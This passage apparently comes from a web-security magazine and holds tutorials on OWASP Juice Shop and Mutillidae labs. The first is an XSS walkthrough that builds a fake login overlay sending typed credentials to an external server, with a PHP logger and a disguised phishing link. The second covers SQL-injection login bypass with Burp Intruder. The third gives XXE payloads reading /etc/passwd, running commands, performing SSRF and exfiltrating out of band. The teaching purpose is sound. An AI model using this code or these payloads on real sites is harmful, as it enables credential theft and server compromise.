<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
And as we can see, our JavaScript code gets executed after being downloaded from the web server we have in
Codeanywhere:
If we open the developer tools (F12), we can see the code is injected in the page:
So, we have just shown the customer one thing: this vulnerability allows an attacker to load JavaScript files from any server the attacker wants. We can also deliver this attack to anyone by simply sharing the following link through a phishing email, the comment section of a web page or a web site coded specifically for that purpose:
https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
Let’s go back to Codeanywhere. Next, we are going to show the customer how we can add entries to the browser history and modify the URL. The web browser allows us to add entries to its history using the History API. We cannot change the domain, but we can change the path of the URL to whatever we want. The function of the History API that allows us to do this is called pushState. The first two arguments of the pushState function can be ignored (set to an empty string) for our purposes, and the third one is the new path we want to appear in the URL and in the browser’s history. Right now, the path in our URL clearly shows the script tag:
For example, let’s change the path to /account/verification. To do so, let’s delete the alert box from our code and
include:
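A minimal sketch of the call described above might look like this. The wrapper name rewriteVisibleUrl is a hypothetical helper added here so the snippet can be exercised outside a browser; in the injected script, the single pushState call is all that is needed.

```javascript
// Sketch only: rewriteVisibleUrl is a hypothetical helper name.
// historyApi is expected to behave like the browser's window.history.
function rewriteVisibleUrl(historyApi, newPath) {
  // The first two arguments (state and title) are not needed here,
  // so they are set to empty strings as the article suggests.
  historyApi.pushState("", "", newPath);
}

// In a browser, pass the real history object.
if (typeof history !== "undefined") {
  rewriteVisibleUrl(history, "/account/verification");
}
```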
And again, save the file, go to OWASP Juice Shop and in the search form, use the HTML script tags with the src
attribute to load our script. Finally press the Search button:
And even though we haven’t refreshed the page (remember the search is done using JavaScript code to perform the
request), we can see a new entry in the web browser’s history list:
So, we have demonstrated that, besides downloading scripts from external sources, an attacker can use JavaScript
code to alter the URL and the web browser’s history.
Next, we are going to modify the visual aspect of the web page. For example, let’s put a semi-transparent layer in front
of the Juice Shop. The idea is to create a section or a div element, give it some CSS properties from JavaScript and
then place the element inside the body tag. But let’s go step by step.
We can create HTML elements by using the document.createElement function. For example, if we want to create a div
element, we can do:
We can apply CSS properties to the element using the style property like this:
div.style.width = "100%";
So, let’s make our layer. We want our div element to take all the screen with:
div.style.width = "100%";
div.style.height = "100vh";
vh stands for viewport height (the entire browser’s window). We also want our div to be positioned at the top left of the
screen. To do so, we set the position as absolute:
div.style.position = "absolute";
div.style.top = 0;
div.style.left = 0;
Next, we want to bring our div element to the front of the page and the element that is at the front is the one in which
the z-index value is higher. Therefore, we give a pretty high value to the CSS z-index property:
div.style.zIndex = 99999;
Finally, to make it semi-transparent, let’s give the element a half-transparent white color. To do so, we are going to use the background CSS property with an RGBA color. RGBA stands for Red Green Blue Alpha. The red, green and blue values each range from 0 to 255: the higher the value, the more of that color. To get white, we give all three the highest value. The alpha value ranges from 0 to 1 and indicates how opaque the color is (0 is fully transparent, 1 is fully opaque). In our case, we will use 0.5. So, the code will look as follows:
Finally, let’s append the div element as a child of the body element using the appendChild function like this:
document.body.appendChild(div);
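Putting the overlay steps together, a sketch could look like the following. The function name buildOverlay and its doc parameter are assumptions made so the code can be run with a stand-in document; the style values are the ones discussed in the text.

```javascript
// Sketch: buildOverlay is a hypothetical helper; doc is a Document-like object.
function buildOverlay(doc) {
  const div = doc.createElement("div");
  div.style.width = "100%";
  div.style.height = "100vh";
  div.style.position = "absolute";
  div.style.top = 0;
  div.style.left = 0;
  div.style.zIndex = 99999;
  // White (255, 255, 255) with an alpha of 0.5.
  div.style.background = "rgba(255, 255, 255, 0.5)";
  doc.body.appendChild(div);
  return div;
}

// In a browser, pass the real document.
if (typeof document !== "undefined") {
  buildOverlay(document);
}
```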
And as we did before, save the file, go to OWASP Juice Shop and in the search form, use the HTML script tags with the
src attribute to load our script. Finally press the Search button:
And you will see the JavaScript code is executed and the whole page gets covered by a semi-transparent white layer:
Therefore, this demonstrates that we are able to change the visual aspect of the web page. However, this is not very
useful. What if we add a web form inside of our div asking for the user’s credentials?
To do so, we will follow the same procedure, create the form element and then append it inside the div. I apologize, I’m
pretty far from being a CSS pro, so the style of the form will not be great, but it will illustrate our point. Let’s start
coding the form by creating the HTML element just like we did before:
• action: the URL of the server-side script that will handle the form
• method: the HTTP method to be used
To set these attributes, we can use the setAttribute method of the form element we have just created. First, set the
method attribute. In this case, it doesn’t matter whether you use GET or POST because we will submit the form using
JavaScript code:
form.setAttribute("method", "post");
Then set the action attribute. The URL will point to a PHP script called credentials.php that we will code right after the
form:
form.setAttribute("action",
"https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php");
but you can name it whatever you like. Then let’s style the form a little bit. The idea is to make the form and its
elements stand out. For example, set the width to be 40%:
form.style.width = "40%";
Next, let’s set the margin top and the margin bottom to 20px and, for the left and right margins, use the auto keyword
to center the form on the screen:
The padding property defines the inner margins of the form. As we’ll add a border to our form, let’s add some space
between the border and the child elements of the form. For example, 20 pixels:
form.style.padding = "20px";
Finally, to see the form area and make the form stand out, we define a border:
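The form steps above can be sketched in one place as follows. The helper name buildForm, the doc parameter and the placeholder URL are assumptions for illustration, and the border value is a guess, since the exact border used in the demo is not shown in the text.

```javascript
// Sketch: buildForm is a hypothetical helper; doc is a Document-like object.
function buildForm(doc, actionUrl) {
  const form = doc.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", actionUrl);
  form.style.width = "40%";
  // 20px for the top and bottom margins, auto for left and right to center the form.
  form.style.margin = "20px auto";
  form.style.padding = "20px";
  // Assumed value: any visible border makes the form area stand out.
  form.style.border = "1px solid black";
  return form;
}

// In a browser, pass the real document; the URL here is a placeholder.
if (typeof document !== "undefined") {
  buildForm(document, "https://attacker.example/credentials.php");
}
```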
Now let’s create the HTML elements that will be inside the form. For example, let’s put a heading tag to indicate to the
user that an account verification is needed. The steps are the same; we create the HTML heading element. An h1 in
this case:
and then style it a little bit. Set the text color to red and center the text:
formTitle.style.color = "red";
formTitle.style.textAlign = "center";
Next, let’s create the input fields of the form to request the user’s username and password. Let’s start creating the
input element for the username:
HTML input fields usually have a type and a name attribute. The type indicates what kind of input you expect from the user. Is it text, an email, a password, …? The name attribute is the reference the server-side code uses to grab the contents of the input. Besides these two attributes, we will add another one called placeholder. The placeholder is a text that helps the user know what to type. As we did previously, to add attributes to an element, we will use the setAttribute method of the created input element. The type of the username input is text, its name is user and its placeholder is username:
userInput.setAttribute("type", "text");
userInput.setAttribute("name", "user");
userInput.setAttribute("placeholder", "username");
Once we have our input created with all its attributes in place, let’s style it a little. Change the display property to
block:
userInput.style.display = "block";
so that our element will be in its own line. Next, set the width to 100%:
userInput.style.width = "100%";
Let’s make the font a little bit bigger to improve its legibility:
userInput.style.fontSize = "1.3em";
and add some padding (inner margin) to leave a space between the text and the input field border:
userInput.style.padding = "4px";
Finally, center the text inside the field:
userInput.style.textAlign = "center";
Now that we have created the input element for the username, the input element for the password is exactly the same.
The only difference is that the value of the type attribute will be password instead of text. As it is the same, I will just
paste the code:
passInput.setAttribute("type", "password");
passInput.setAttribute("name", "pass");
passInput.setAttribute("placeholder", "password");
passInput.style.display = "block";
passInput.style.width = "100%";
passInput.style.fontSize = "1.3em";
passInput.style.padding = "4px";
passInput.style.textAlign = "center";
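Since the username and password inputs differ only in their type, name and placeholder, the repeated lines can also be folded into one helper. This is an optional refactoring sketch, not the article's code: createInput and its doc parameter are hypothetical names.

```javascript
// Sketch: createInput is a hypothetical helper; doc is a Document-like object.
function createInput(doc, type, name, placeholder) {
  const input = doc.createElement("input");
  input.setAttribute("type", type);
  input.setAttribute("name", name);
  input.setAttribute("placeholder", placeholder);
  // Same styling as the hand-written username and password inputs.
  input.style.display = "block";
  input.style.width = "100%";
  input.style.fontSize = "1.3em";
  input.style.padding = "4px";
  input.style.textAlign = "center";
  return input;
}

// In a browser, the two inputs could then be created like this.
if (typeof document !== "undefined") {
  const userInput = createInput(document, "text", "user", "username");
  const passInput = createInput(document, "password", "pass", "password");
  console.log(userInput.name, passInput.name);
}
```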
To complete our form, let’s add a submit button. The submit button is just another type of input element we can add to a form. We create it as usual and set its type attribute to submit (display is a CSS property rather than an HTML attribute, so it is set through the style property further below):
submitButton.setAttribute("type", "submit");
and then, you can set the value attribute of the input to display text inside the button. In this case, the submit button
will display the word Verify:
submitButton.setAttribute("value", "Verify");
After setting the attributes of the submit button, let’s style it just as we did with the other input elements:
submitButton.style.display = "block";
submitButton.style.width = "100%";
submitButton.style.fontSize = "1.3em";
submitButton.style.padding = "4px";
Now that the header and the input elements are created, append them to the form:
form.appendChild(formTitle);
form.appendChild(userInput);
form.appendChild(passInput);
form.appendChild(submitButton);
div.appendChild(form);
We are done coding the form. The last thing we have to do is code the functionality of sending the credentials back to
our server once the user clicks the submit button. But, before doing that, let’s see the form. Go to the OWASP Juice
Shop application and use the script tags to load our script just like we did before:
<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
Right now, the form does nothing. Let’s add the functionality to submit the form using JavaScript code. But first, let’s code the PHP file that will save the credentials sent by the form. To do so, let’s go to Codeanywhere (our server) and create a new file:
In this case, I named the file credentials.php and clicked the OK link:
In the file, let’s start by using the error_reporting function to prevent PHP from showing any errors:
error_reporting(0);
Next, let’s define a variable called $user to store the value of the username. As you may notice, in the PHP language, variables start with a dollar ($) sign. The username value will be passed to us as a parameter in the query string of the URL. To access the parameters passed in the URL, we can use the $_GET variable, which holds all the parameters and values passed in the query string. The query string is the part that comes after the question mark (?) and is composed of key-value pairs separated by an ampersand (&) sign like this:
?parameter0=value0&parameter1=value1&parameter2=value2
To read a single parameter, we index $_GET with the parameter’s name:
$_GET["parameter"]
In our case, we read the user and pass parameters:
$user = $_GET["user"];
$pass = $_GET["pass"];
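For readers more at home in JavaScript than in PHP, the same key-value structure of the query string can be inspected with the standard URL API. This is only an illustration of how the string is split into parameters; the host attacker.example is a placeholder, not the demo server.

```javascript
// Placeholder URL: only the query string matters for this illustration.
const exampleUrl = new URL(
  "https://attacker.example/credentials.php?user=testuser&pass=testpass"
);

// searchParams exposes the key-value pairs that come after the "?".
const userParam = exampleUrl.searchParams.get("user");
const passParam = exampleUrl.searchParams.get("pass");

console.log(userParam, passParam);
```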
Now that we have retrieved the username and password from the URL, let’s save them into a file that I called credentials.txt. To do so, let’s open the file using the fopen function. There are multiple modes to open a file. In this case, we will open the file with the mode a+, which opens it for reading and writing, places the file pointer at the end of the file and creates the file if it does not exist.
Now let’s write the username and password to this file. To do so, we use the fwrite function. We need to pass the fwrite function a reference to the file, in our case the $file variable, and then the content we want to write. The dot symbol concatenates (joins) strings and \n inserts a newline:
Once we finish working with the file, we should close it to be sure the changes are saved correctly to the credentials.txt
file:
fclose($file);
Save the file and let’s try it out. Right click on the file and select Preview:
But now, if we add the user and pass parameters in the query string and press Enter:
Even though it seems nothing happened, if we go back to Codeanywhere, we will be able to see a new file called
credentials.txt that contains the values passed in the query string for the user and pass parameters:
Now that we have tested our credentials.php file and seen that it works, let’s code the functionality of the form so that,
when the user clicks the Verify button, the username and password will be sent to this URL. In Codeanywhere open
the JavaScript file. First, we are going to add what is called an event handler. An event handler allows us to respond to
different events that can happen in a web page. In our case, we are interested in the form submission. To add an event
handler, we use the addEventListener method, passing as an argument the name of the event we want to handle
(submit in our case) and then a function with code we want to execute each time the event happens. The code looks
like this:
The handler can be written either as a classic function expression:
function(event){}
or as an arrow function:
event => {}
Inside the curly braces goes the JavaScript code that will be executed when the form is submitted. The first thing we want to do is to prevent the default behavior of the submit event. Each time we submit a form, by default, the browser sends the user to the URL given in the action attribute of the form. However, in this case, we do not want the user to get redirected to our server; we want the user to stay on the page. To prevent this default behavior, we use the preventDefault method of the submit event:
event.preventDefault();
Next, let’s send the credentials to our server URL. To do so, we will use the fetch function. First, let’s copy the URL where we want to send the username and the password of the user:
`http://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass=testpass`
and switch the scheme from http to https:
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass=testpass`
Instead of using single quotes (') or double quotes ("), we will use the backtick (`) for our string because it allows us to include variables within the string. This JavaScript feature is called template literals and lets us place any variable or expression inside curly braces preceded by a dollar sign: ${}. So, as we want the values of the user and pass inputs, we will change the URL from this:
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=testuser&pass=testpass`
To this:
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=${userInput.value}&pass=${passInput.value}`
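The following sketch shows the template literal at work outside the browser. The helper buildCredentialsUrl and the host attacker.example are hypothetical; the use of encodeURIComponent is an addition that is not in the article's code, included because a value containing & or = would otherwise be split into extra parameters.

```javascript
// Sketch: buildCredentialsUrl is a hypothetical helper name.
function buildCredentialsUrl(baseUrl, user, pass) {
  // ${...} inserts the value of an expression into the backtick string.
  // encodeURIComponent (an addition to the article's code) escapes characters
  // such as "&", "=" and spaces so they stay inside their parameter.
  return `${baseUrl}?user=${encodeURIComponent(user)}&pass=${encodeURIComponent(pass)}`;
}

const builtUrl = buildCredentialsUrl(
  "https://attacker.example/credentials.php", // placeholder host
  "test user",
  "p&ss=1"
);

console.log(builtUrl);
```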
Therefore, each time someone clicks on the submit (Verify) button, the username and password typed in the form will
be included in the URL. Also, for the purpose of this demo and to avoid problems with CORS (Cross-Origin Resource
Sharing), besides the URL as a first argument to the fetch function, we will pass a second argument setting the mode
property of the request to have the value no-cors. The code will look like:
fetch(
`https://h9demoxss-h9articlexss483243.codeanyapp.com/credentials.php?user=${userInput.value}&pass=${passInput.value}`,
{mode: "no-cors"}
);
Finally, we hide the div to let the user keep using the OWASP Juice Shop application:
div.style.display = "none";
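Assembled, the event handler described over the last few paragraphs might look like the sketch below. The wrapper attachSubmitHandler and its parameters (including the injected fetchFn and the endpoint string) are assumptions made so the logic can be exercised with stand-in objects in a lab; inside the demo script the body of the listener is what matters.

```javascript
// Sketch: attachSubmitHandler and its parameter names are hypothetical.
// form, userInput, passInput and div are the elements built earlier;
// fetchFn is expected to behave like the browser's fetch function.
function attachSubmitHandler(form, userInput, passInput, div, endpoint, fetchFn) {
  form.addEventListener("submit", (event) => {
    // Keep the browser from navigating to the form's action URL.
    event.preventDefault();

    // Build the request URL from the typed values.
    const url = `${endpoint}?user=${encodeURIComponent(userInput.value)}` +
                `&pass=${encodeURIComponent(passInput.value)}`;

    // no-cors: send the request without needing CORS headers from the server.
    fetchFn(url, { mode: "no-cors" });

    // Hide the overlay so the user can keep using the application.
    div.style.display = "none";
  });
}
```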
Save the file. Go to the OWASP Juice Shop application and use the script tags to load our script just like we did before:
<script src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
The form will appear as before but now, if we enter any credentials on the form and click the Verify button:
And if we go to Codeanywhere, we will be able to see that the credentials entered by the user have been saved in the
credentials.txt file:
Congratulations. Thank you for reading the article to the end. As I shared before, this attack can be delivered by just
sharing the following link through a phishing email, through a website or just leaving a note in the comment section:
https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>
Even though it is outside of the scope of this article, there are many techniques that will allow us to hide the link such
as the following one:
<a href='https://h9demoxss-juice-shop.herokuapp.com/#/search?q=<script+src="https://h9demoxss-h9articlexss483243.codeanyapp.com/h9demo.js"></script>'>Google</a>
Closing
Many thanks for the time you have spent reading the article. For more information and source code, visit my GitHub
page: https://github.com/epasan/h9demoxss
References
Talks:
Books:
Websites:
• History API
• Request.Mode
Free resources:
• Google XSS-Game
A series of challenges to learn how to perform cross-site scripting attacks
Paid resources:
• Pentester Academy
It is one of the best resources available for learning anything you want about cybersecurity. It
has three great courses that can help you get started:
• WAP Challenges
Web App Hacking
Examples
Hamdi Sevben
ABOUT THE AUTHOR
Hamdi SEVBEN
Hamdi SEVBEN is a master's student of cyber security in computer science at the Gebze
Technical University. He received his bachelor's degree in computer science from the
He worked on the defensive side of cyber security at a private company for 6 years,
from 2013 to 2019. In particular, he conducts research on ethical hacking and web app
testing.
He also holds the CEH v10 certificate from EC-Council and the CPEH and CPTE certificates from Mile2.
His next target is the OSCP exam, which takes 23 hours and 45 minutes, and OSCE
Web App Hacking Examples
We'll skip the theoretical parts and work through example scenarios of web attacks. As it is forbidden to attack any site without the owner's written consent, we will run our attacks against https://juice-shop.herokuapp.com/#/. This platform has been designed by OWASP for testing purposes.
First, we should always look at the source code of the web page. When I check it, I can't find anything important for this web page. Then we can open and check the page in debugger mode; for tests like these, we usually use the Firefox developer tools:
Let's open it in debugger mode and check the main-es2015.js JavaScript file. It is not in a readable format, so we can run it through a JavaScript beautifier. When analyzing the JavaScript code, the "administration" path draws our attention:
When we try to go to the "administration" path, we get a 403 status code, which means the request is forbidden.
We can go to the login panel and try default usernames and passwords, like admin:admin, either manually or with a dictionary list, or test whether it is open to attacks such as SQL injection.
In this panel, we can try authentication bypass techniques with Burp Suite. To do so, we go to "https://github.com/swisskyrepo/PayloadsAllTheThings". After cloning it with git clone, let's check the ready-made word lists Auth_Bypass.txt and Auth_Bypass2.txt in the SQL Injection/Intruder directory. Trying so many possibilities one by one would take a long time, and we might miss some significant points; handing the list to the Burp Suite Intruder is much faster and easier than testing manually.
Then we enable the FoxyProxy add-on in Firefox so that we can inspect the traffic by placing Burp Suite between Firefox and the web server. You can also set the browser proxy the long way, through Edit-Preferences-Network Proxy-Settings-Manual proxy configuration, whenever necessary. Since the add-on activates the proxy with a single click, is the long way still necessary? The decision is yours.
After that, we try to log in with the admin:admin credentials and capture the request in the Intercept section of Burp.
Afterwards, we right-click the request and send it to Intruder so that we can assign the related payloads.
In the Intruder tab, there are five payload positions at first, but only email and password are required.
Before moving to the Payloads tab, we first need to remove the other three with Clear.
To set the payload options, we can load payload lists like Auth_Bypass.txt and Auth_Bypass2.txt, which we cloned from GitHub, or any list we have downloaded or created.
You can also use Fuzzing – SQL injection under Add from list … if your version of Burp is Pro.
Once they are loaded, you will see a bunch of payloads that we might not remember or think of on our own.
While scanning the results from top to bottom, the Status and Length columns especially catch our attention.
First we need to look at where Status and Length change. When we check the first row, the 401 code means unauthorized. You will also see an invalid email or password answer in the response section.
On the second row, the 500 code stands for internal server error, and the response reveals that the DBMS is SQLite, which is a risky information leak.
If we sort by the Status column, the rows will be ordered as follows. Finally, we see a large number of 200 OK success codes, which indicate a successful authentication.
Here the token value draws our attention. It looks like base64. Let’s try to decode it on
https://codebeautify.org/base64-decode.
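The same decoding can be done locally instead of pasting a token into a website. The sketch below assumes the token has a JWT-style layout (dot-separated base64url segments), which is an assumption on my part since the text only says it looks like base64; the sample token is built on the spot from made-up data and is not a real response from the application.

```javascript
// Decode one base64url-encoded segment into text.
function decodeSegment(segment) {
  // Map the URL-safe alphabet back to standard base64 and restore padding.
  const base64 = segment.replace(/-/g, "+").replace(/_/g, "/");
  const padded = base64 + "=".repeat((4 - (base64.length % 4)) % 4);
  return atob(padded);
}

// Made-up sample token built locally; it is not a real Juice Shop token.
const samplePayload = JSON.stringify({
  status: "success",
  data: { email: "user@example.com" },
});
const sampleToken = [
  "e30",                                  // base64 of "{}" as a dummy header
  btoa(samplePayload).replace(/=+$/, ""), // payload without padding
  "signature",                            // dummy third segment
].join(".");

// Decode the middle segment and parse it as JSON.
const decodedPayload = JSON.parse(decodeSegment(sampleToken.split(".")[1]));
console.log(decodedPayload.data.email);
```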
On the login panel, typing ' or 1=1-- or [email protected] in the email field and entering anything or admin123 in the password field, we see that we are logged in.
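To see why such an input can bypass the login, consider a hypothetical server that builds its SQL query by string concatenation. The query text and the function name buildLoginQuery are illustrative assumptions and are not taken from the application's real code.

```javascript
// Hypothetical vulnerable query builder; not the application's real code.
function buildLoginQuery(email, password) {
  return "SELECT * FROM Users WHERE email = '" + email +
         "' AND password = '" + password + "'";
}

const normalQuery = buildLoginQuery("user@example.com", "secret");
const injectedQuery = buildLoginQuery("' or 1=1--", "anything");

console.log(normalQuery);
console.log(injectedQuery);
// In the injected query, the quote closes the email string, "or 1=1" makes the
// condition true for every row, and "--" turns the password check into a comment.
```

Binding the values as query parameters instead of concatenating them keeps the input from being interpreted as SQL.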
We can click Account and Your Basket, and we can even visit the profile page.
And that’s all! Hope you enjoyed those examples! Remember, hacking is a skill that constantly needs to be practiced.
XML External
Entities (XXE)
by Angelo Anatrella
ABOUT THE AUTHOR
Angelo Anatrella
since I was a child. I have more than five years of work experience in
Professional).
https://www.linkedin.com/in/angelo-anatrella-67719a53/
XML External Entities (XXE)
Contents
1. Introduction
4. Mitigations
1. Introduction
The development of technology and the rise of the World Wide Web have undoubtedly improved the quality of life, breaking down the barriers of time and space in both the family and the commercial sphere.
However, the spread of technology has at the same time exposed each individual's privacy, image and personal data to new forms of aggression: consider fraud, computer viruses, the possession of access credentials or identification codes belonging to others, and all those behaviors that amount to illegal interference with other people's telematic and IT activities.
The spread of Web Applications, which provide value-added services accessible through different channels, has on the one hand brought innumerable benefits to the end user (purchase of goods and services, distance learning, etc.) but on the other hand has produced new problems, such as dangerous security issues.
Web Applications continuously interact with users, receiving data that is first processed and then supplied to the
underlying technologies.
A web application generally offers various features, each of which can be defined as correct when, given an input
provided by the user, which satisfies the "preconditions" established by the developer, there is an output that respects
the "postconditions" established by the same.
The preconditions specify any definition restrictions on the set of input data, while the postconditions specify the
outputs.
If an input is supplied that does not satisfy one of the preconditions, that case must still be handled so that the
Web Application does not behave unpredictably while processing it.
The data processing phase should therefore validate the input and, where needed, sanitize it to strip intentionally
malicious code included with the aim of altering the normal behavior of the web application.
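The idea of preconditions and postconditions can be sketched in a few lines of Python. The field (a purchase quantity), the function name and the limits below are assumptions chosen for illustration; they do not come from any particular application.

```python
def parse_quantity(raw: str, max_quantity: int = 100) -> int:
    """Validate a user-supplied quantity field (hypothetical example)."""
    # Precondition 1: the input is a short string of ASCII digits only.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 4):
        raise ValueError("quantity must be a short positive integer")
    value = int(raw)
    # Precondition 2: the value lies in the range the developer allows.
    if not 1 <= value <= max_quantity:
        raise ValueError("quantity out of range")
    # Postcondition: the caller always receives an int in [1, max_quantity].
    return value


print(parse_quantity("3"))
```

Inputs that violate a precondition are rejected explicitly instead of being passed on to the underlying technologies.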
The growing complexity of applications makes validating and filtering user input a genuinely difficult problem. A user
can also encode the input in multiple ways to evade the developer's filtering strategy.
In this article, we will examine a web attack that is still little known, despite ranking fourth in the OWASP Top Ten
2017. This attack exploits a weakness in the input processing phase when the web application accepts an XML document
as input.
After examining the basic structure of an XML document, we will analyze two scenarios: in-band XXE and out-of-band
(OOB) XXE.
XML (Extensible Markup Language) is a markup language used to define a syntax for document encoding. It does that
through the use of tags that define the structure of the document, as well as how the document should be stored and
transported. The XML 1.0 standard defines the structure in detail.
<?xml version="1.0"?>
<papers>
  <paper>
    <author>Angelo Anatrella</author>
    <title>XML External Entity</title>
    <publisher>Hakin9</publisher>
  </paper>
</papers>
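To see how a program consumes such a document, the sketch below parses the sample with Python's standard xml.etree.ElementTree module. The helper name list_papers is an assumption made for this example.

```python
import xml.etree.ElementTree as ET

DOCUMENT = """<?xml version="1.0"?>
<papers>
  <paper>
    <author>Angelo Anatrella</author>
    <title>XML External Entity</title>
    <publisher>Hakin9</publisher>
  </paper>
</papers>"""


def list_papers(xml_text: str) -> list:
    """Return one dict per <paper>, mapping child tag names to their text."""
    root = ET.fromstring(xml_text)
    return [
        {child.tag: (child.text or "").strip() for child in paper}
        for paper in root.findall("paper")
    ]


papers = list_papers(DOCUMENT)
print(papers)
```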
To verify the validity and consistency of the document, it is recommended, although not mandatory, to use a DTD
(Document Type Definition), which contains the tag definition rules and specifies the permitted elements, their
structure, their number and their order in the XML document. In other words, the DTD defines the grammar of the document.
The XML 1.0 standard also defines a concept called an entity, which is nothing more than a storage unit of a certain type.
An entity is used to define abbreviations commonly used in the document, to divide the document into several parts, or
to divide the DTD into several parts and make it modular.
An entity is internal when its value is declared directly in the DTD, or external when its value is referenced by a
URI (Uniform Resource Identifier).
If a web application accepts an XML input, an element called “parser” will be required to perform the syntactic
analysis of the XML.
The in-band XXE (XML External Entity) vulnerability exploits a weakness in the XML parser configuration. The
attack occurs when XML input containing a reference to an "external entity" is processed by an insecurely configured
XML parser.
So, if the web application accepts an XML document as input and the parser is not properly configured, an attacker
could craft a malicious XML document that references an "external entity" and use it to steal sensitive data from the
server's filesystem.
In some less frequent cases, exploiting the same vulnerability, it is also possible to perform remote command
execution or a denial of service attack.
Referencing Figure 1, the steps to perform the XXE in band attack are:
2) The XML parser processes the XML submitted with the reference to a specific file on the vulnerable server’s
filesystem;
To practice the techniques shown in this article, we recommend the OWASP Mutillidae 2 Project, a deliberately
vulnerable open source web application that can serve as a target for studying the OWASP Top Ten vulnerabilities
through a hands-on approach.
To test the XXE, it’s possible to use the XML Validator accessible via the Mutillidae web application menu (OWASP
2017 –> A4-XML External Entities –> XML External Entity Injection –> XML Validator).
XML Submitted
The XML is validated and its content is parsed. Now let's try to understand the use of entities:
XML Submitted
If we define an entity “word” and reference it with &word;, the parser prints its value in the output:
Hello World
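The behavior is not specific to Mutillidae. As a minimal sketch, the Python standard library parser expands an internal entity in the same way. The document below is an assumed reconstruction of this kind of input (the element name message is made up), not the exact XML submitted to the validator.

```python
import xml.etree.ElementTree as ET

# Assumed example: an internal entity "word" declared in the DTD
# and referenced once in the document body.
XML_WITH_ENTITY = """<?xml version="1.0"?>
<!DOCTYPE message [
  <!ENTITY word "Hello World">
]>
<message>&word;</message>"""

root = ET.fromstring(XML_WITH_ENTITY)
expanded = root.text  # the parser has already replaced &word; with its value
print(expanded)
```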
It seems harmless, but an attacker could exploit entities to exhaust the parser's memory and cause a denial of
service by nesting entities inside other entities, like a matryoshka doll.
XML Submitted
Hello World World World World World World World World World
World World World World World World World World World World
World World World World World World World World World World
World World World
For this reason, some parsers limit by default the amount of memory that entity expansion can use.
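The growth is exponential, which a short calculation makes concrete. The sketch below only does the arithmetic and parses nothing; the parameter names and the sample values are assumptions for illustration.

```python
def expanded_length(base_len: int, refs_per_level: int, levels: int) -> int:
    """Length of the text produced by fully expanding the outermost entity.

    Level 0 is a plain string of `base_len` characters. Every higher level is
    an entity whose value references the level below it `refs_per_level` times.
    """
    return base_len * refs_per_level ** levels


# A 5-character value referenced 10 times per level (assumed figures).
for levels in (0, 3, 6, 9):
    print(levels, expanded_length(base_len=5, refs_per_level=10, levels=levels))
```

A handful of short declarations is therefore enough to ask the parser for gigabytes of text.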
Now let's try to access files. Let's start from the robots.txt file contained in the root directory of the web application.
XML Submitted
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "robots.txt">]><foo>&xxe;</foo>
The XXE payload submitted defines an external entity &xxe; whose value is the content of the robots.txt file, which in
this example is shown on screen:
Now that we understand how it works, we can try to craft an XML document to access more interesting files on the
filesystem:
XML Submitted
In the case above, the XXE payload submitted defines an external entity with the content of the /etc/passwd file as
value:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
(...)
In particularly interesting cases, an XXE attack can be escalated to RCE (remote command execution). The example
below exploits the PHP "expect" module, which must be loaded on the server for the attack to work:
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
Another important impact of the XXE attack is the possibility of exploiting it to perform a server-side request
forgery (SSRF) attack. In this case, an attacker induces the server-side application to make an HTTP request to
any URL that the server can reach. To perform an attack of this type, it is necessary to define an XML entity with a
target URL. You can use this attack to read the returned values or just to perform blind SSRF.
The example below shows an XML document that makes an HTTP request to a given host on the specified port:
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://hostname:port/" >]>
<foo>&xxe;</foo>
An attacker could use this attack to access, for example, systems inside a network protected by a firewall and normally
not accessible from the outside.
The cases analyzed so far are examples of in-band XXE. These are the most common cases, in which the attacker receives
a response immediately after sending the malicious payload. There are also blind XXE cases, known as OOB
(out-of-band), in which the web application returns no immediate response.
Exploiting an OOB XXE requires the XML parser to make a request to an external server under the attacker's control.
This is what allows the attacker to steal sensitive data from the vulnerable server.
The attack involves defining an external DTD, hosted on the attacker's server, and using parameter entities, which
define abbreviations for use within a DTD. A parameter entity reference begins with the character %.
XML Input
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hostAttacker:port/evil.dtd">%dtd;]>
<data>&send;</data>
DTD
<!ENTITY % all "<!ENTITY send SYSTEM 'http://hostAttacker:port/?collect=%file;'>">
%all;
1. The XML parser processes the parameter entity %file, which will load the file /etc/passwd.
2. The XML parser makes an HTTP request to get the DTD exposed by the attacker's server to the address
http://hostAttacker:port/evil.dtd and then will process the DTD.
3. The parameter entity %all creates a general entity "send" whose value is a URL. This URL embeds the content of
the /etc/passwd file: http://hostAttacker:port/?collect=root:!:0:0::/:/usr/bin/(…)
4. The XML parser processes the send entity and makes an HTTP request to the attacker's server. The
attacker can then recover the stolen data by analyzing the server's logs.
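In a lab, the log analysis in step 4 amounts to pulling the collect parameter out of each logged request. The sketch below assumes the request target has already been extracted from a log line; the function name and the sample value are hypothetical.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_collected(request_target: str, param: str = "collect") -> Optional[str]:
    """Return the URL-decoded value of `param` from a logged request target."""
    query = urlsplit(request_target).query
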